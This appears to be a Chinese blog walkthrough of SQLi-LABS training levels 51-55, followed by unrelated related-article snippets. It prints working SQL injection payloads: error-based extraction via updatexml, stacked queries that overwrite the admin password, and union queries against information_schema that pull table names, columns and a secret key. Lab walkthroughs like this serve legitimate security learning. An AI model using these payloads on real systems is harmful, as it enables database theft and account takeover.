SQLi-LABS通关攻略【51-55关】

news2024/11/22 20:32:57

SQLi-LABS 51关

51关和50关一样,只是改为了单引号闭合

依旧有报错信息,可以使用报错注入

构造payload,得到数据库名

?sort=1' and updatexml(1,concat(1,database()),1)--+

SQLi-LABS 52关

52关和50关一样,但是没有报错信息,所以报错注入的方式行不通

可以使用堆叠注入或者时间盲注

这里使用堆叠注入

构造payload更改admin的密码,测试堆叠注入是否可行

?sort=1;update users set password='777' where username='admin'--+

修改成功,存在堆叠注入

SQLi-LABS 53关

53关和52关一样,同样是没有报错信息,但是是字符型,使用单引号闭合

构造payload更改admin的密码为444

?sort=1';update users set password='444' where username='admin'--+

 更改成功,存在堆叠注入

SQLi-LABS 54关

本关是全新的模式

这一关就是让我们在十次的查询次数内找到secret key

如果超过十次没有结果,那就会重置本关

我们直接测试闭合方式,是字符型,单引号闭合

因为题目中指定了数据库'challenges'

接下来直接使用联合注入进行表名查询

?id=-1'union select 1,2,table_name from information_schema.tables where table_schema=database()--+

得到表明是这个 p7bqnwkvaj

接下来查询字段

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='p7bqnwkvaj'--+

最后直接查询secret_VO6I字段

?id=-1'union select 1,2,secret_VO6I from p7bqnwkvaj--+

将得到key提交就算过关了

SQLi-LABS 55关

55关和54关一样,只是查询次数改为14次,闭合方式改为数字型括号闭合

题目依旧指定了数据库名是'challenges'

所以我们直接查表名

?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

 得到表明是250xkt025w

接下来查字段

?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='250xkt025w'--+

查询secret_DMQK字段

?id=-1) union select 1,2,secret_DMQK from 250xkt025w --+

得到key后直接提交就可以通关了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2091772.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

智慧监管:地理信息与遥感技术驱动下的社会治理新纪元

在信息化浪潮席卷全球的今天,智慧监管已成为推动社会治理现代化的关键力量。本文将深入剖析智慧监管的概念、技术基础、应用场景及其对社会发展的深远影响,探讨如何在新时代背景下,利用地理信息与遥感技术构建更加智慧、高效的监管体系。 智…

仿华为车机UI--图标从Workspace拖动到Hotseat同时保留图标在原来位置

基于Android13 Launcher3,原生系统如果把图标从Workspace拖动到Hotseat里则Workspace就没有了,需求是执行拖拽动作后,图标同时保留在原位置。 实现效果如下: 实现思路: 1.如果在workspace中拖动,则保留原来“改变图标…

【u盘还原教程】如何把启动u盘恢复回普通U盘

之前制作ubuntu启动盘装双系统 1、插入U盘,右键点击“此电脑”,选择“管理”,在“计算机管理”的面板中点击打开“磁盘管理”,会看到目前电脑上的所有磁盘,找到U盘的索引名(如图标识,这里是“…

2024最新VMware17安装Windows10详细记录

本次将带来虚拟机VMware Workstation 17 pro安装Win10的教学,可用于各种软件测试,这里虽然只是示范了win10安装教学,实际上可以安装很多系统,步骤都差不多; 下载 一、下载虚拟机软件 下载方式一:官网下载…

虚拟机安装docker时yum错误及及解决方案

** Could not resolve host: mirrorlist.centos.org; 未知的错误 ** 出现这种错误,先尝试 ping www.baidu.com,然后再尝试 ping mirrorlist.centos.org 如果,baidu.com可以ping通,mirrorlist.centos.org 不能ping通&#xff0…

【三十四】springboot+easyRule初识规则引擎

代码场景:厂里有几个员工,现在厂长颁布了新的厂规关于薪资发放,如下: 1、加班时长超过80小时的,一个小时10块钱;不满80小时的,不算加班。2、上班打卡迟到3次以下的不扣钱,3次以上的一…

期权交易误区分享:喜欢重仓!

今天带你了解期权交易误区分享:喜欢重仓!期权交易虽然吸引人,但也有不少容易掉进去的坑。 有的投资者被单个期权的百倍利润吸引,喜欢“一口吃成胖子”。 重仓买入虚值和重度虚值的期权,当标的有大涨或大跌时&#xf…

零基础Opencv学习(一)

一、显示图片 #include "opencv2/opencv.hpp" #include "opencv2/core/core.hpp" #include "opencv2/highgui/highgui.hpp" #include "opencv2/imgproc/imgproc.hpp"cv::Mat image cv::imread("E:/OpencvStudyTest/1.png"…

量化投资策略与技术学习PART1.1:量化选股之再谈多因子模型(二)

在上一个多因子模型中,我手动对各个因子进行了回测,但是数据结果并不是十分理想,难道基本面指标真的和股票走势关系不大么? 这里我还是准备再测试一下,策略如下: (1)首先我获取了一下…

Doped code 介绍

doped是一款Python软件,用于缺陷超单元计算的生成、前/后处理和分析,以高效、可重复、用户友好、功能强大且完全可定制的方式实施缺陷模拟工作流程。 https://doped.readthedocs.io/en/latest/ 教程页面提供了演示代码功能和用法, 该软件包的…

考试评分系统设计与实现/基于django的在线考试系统

摘要 随着互联网技术的不断发展,各行各业的工作学习的模式都发生了不小的变化,们通过互联网技术不仅能够提高工作效率还能够降低出错的几率。而对于考试评分,一个专业的系统可以帮助管理者更加有效管理在考试评分,可以帮助提高克服…

vaspup2.0介绍

实时软件库:https://github.com/kavanase/vaspup2.0 vaspup是一个bash脚本集合,可以有效地生成和分析VASP收敛测试计算。 最初的vaspup是由Alex Ganose开发,用于基态能量收敛测试和POTCAR生成。 vaspup2.0的功能包括: 基态能量相对于ENCUT和k点密度的收敛…

Linux 配置wireshark 分析thread 使用nRF-Sniffer dongle

Linux 配置wireshark nRF-Sniffer-for-802.15.4 1.下载固件和配置文件 https://github.com/NordicSemiconductor/nRF-Sniffer-for-802.15.4 2.烧写固件 使用nRF Connect for Desktop 中的 programmer 4.3烧写 https://www.nordicsemi.com/Products/Development-tools/nrf-conne…

python07-单元测试框架unittest1-1

前言 单元测试是软件开发中不可或缺的一部分,可以帮助开发人员确保代码的正确性、可靠性和稳定性,python是一种广泛使用的程序语言,提供了多种单元测试工具,最常用的是unittest。本文将介绍unittest package, 包括如何编写测试Tes…

干货分享|分享一款高效的文件搜索工具 Everything

介绍:Everything软件是一款高效的文件搜索工具,主要用于快速定位计算机中的文件和文件夹。 官网地址:voidtools 下载方法:只需依据电脑配置与个人需求选择合适的版本下载,安装过程中一路默认即可轻松完成设置。 注&…

C语言刷题日记(附详解)(3)

一、选填部分 第一题: 以下的变量定义语句中,合法的是( ) A. byte a 128; B. boolean b null; C. long c 123L; D. float d 0.9239; 思路提示:观察选项时不要马虎,思考一下各种类型变量的取值范围,以及其初始化的形式是…

基于yolov8的课堂行为检测系统python源码+onnx模型+评估指标曲线+精美GUI界面

【算法介绍】 基于YOLOv8的课堂行为检测系统是现代教育技术的创新应用,该系统利用YOLOv8这一先进的深度学习算法,实现了对学生课堂行为的自动、高效和精准监测。YOLOv8在目标检测领域以其卓越的性能和速度著称,通过对学生上课视频或实时摄像…

深入学习AI大模型服务平台的选型应用相关技术和问诊咨询

AI大模型服务平台的选择和应用涉及到多个技术层面和业务需求的考量。下面我会详细介绍几个关键的技术点和应用场景,帮助您更好地理解和选择AI大模型服务平台。 技术选型 1.1 大模型种类 语言模型:如BERT、GPT-3、文心一言等,适用于自然语言…

自动驾驶---什么是Frenet坐标系?

1 背景 为什么提出Frenet坐标系?Frenet坐标系的提出主要是为了解决自动驾驶系统在路径规划的问题,它基于以下几个原因: 符合人类的驾驶习惯: 人类驾驶员在驾驶过程中,通常不会关心自己距离起点的横向和纵向距离&#x…

C++学习笔记——约瑟夫问题

一、题目描述 二、代码 #include<iostream>using namespace std;int main() {int n;//新建变量n int m;//新建变量m cin >>n;//键盘输入n cin >>m;//键盘输入m int a[n];//初始化数组 for(int i0;i<n;i){a[i] i1;}int* p &a[0];//指针指向数组的第一…